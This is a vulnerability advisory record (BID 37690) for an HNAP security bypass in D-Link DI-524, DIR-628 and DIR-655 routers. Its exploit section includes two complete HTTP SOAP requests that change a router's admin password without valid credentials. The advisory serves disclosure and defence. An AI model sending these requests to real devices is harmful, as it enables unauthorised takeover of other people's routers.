ID

VAR-E-201001-1162


TITLE

D-Link Multiple Routers HNAP Protocol Security Bypass Vulnerability

Trust: 0.3

sources: BID: 37690

DESCRIPTION

Multiple D-Link routers are prone to a security-bypass vulnerability.
Remote attackers can exploit this issue to bypass security restrictions and access certain administrative functions.
This issue affects the following routers:
DI-524
DIR-628
DIR-655

Trust: 0.3

sources: BID: 37690

AFFECTED PRODUCTS

vendor:d linkmodel:dir-655scope:eqversion:0

Trust: 0.3

vendor:d linkmodel:dir-628scope:eqversion:0

Trust: 0.3

vendor:d linkmodel:di-524scope:eqversion:0

Trust: 0.3

sources: BID: 37690

EXPLOIT

An attacker can exploit this issue by using readily available network utilities.
The following example requests are available:
Example 1:
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1:8099
SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"
Content­Length: 453
<?xml version="1.0" encoding="utf­8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema­instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<SetDeviceSettings xmlns="http://purenetworks.com/HNAP1/">
<AdminPassword>testing123</AdminPassword>
</SetDeviceSettings>
</soap:Body>
</soap:Envelope>
Example 2:
POST /HNAP1/ HTTP/1.1
Authorization: Basic dXNlcjo=
Host: 192.168.0.1
SOAPAction: "http://purenetworks.com/HNAP1/SetDeviceSettings"
Content­Length: 453
<?xml version="1.0" encoding="utf­8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema­instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<SetDeviceSettings xmlns="http://purenetworks.com/HNAP1/">
<AdminPassword>testing123</AdminPassword>
</SetDeviceSettings>
</soap:Body>
</soap:Envelope>

Trust: 0.3

sources: BID: 37690

PRICE

Free

Trust: 0.3

sources: BID: 37690

TYPE

Design Error

Trust: 0.3

sources: BID: 37690

CREDITS

SourceSec Security Research

Trust: 0.3

sources: BID: 37690

EXTERNAL IDS

db:BIDid:37690

Trust: 0.3

sources: BID: 37690

REFERENCES

url:http://www.sourcesec.com/lab/dlink_hnap_captcha.pdf

Trust: 0.3

url:http://www.dlink.com/

Trust: 0.3

sources: BID: 37690

SOURCES

db:BIDid:37690

LAST UPDATE DATE

2022-07-27T09:55:00.611000+00:00


SOURCES UPDATE DATE

db:BIDid:37690date:2010-01-11T17:51:00

SOURCES RELEASE DATE

db:BIDid:37690date:2010-01-09T00:00:00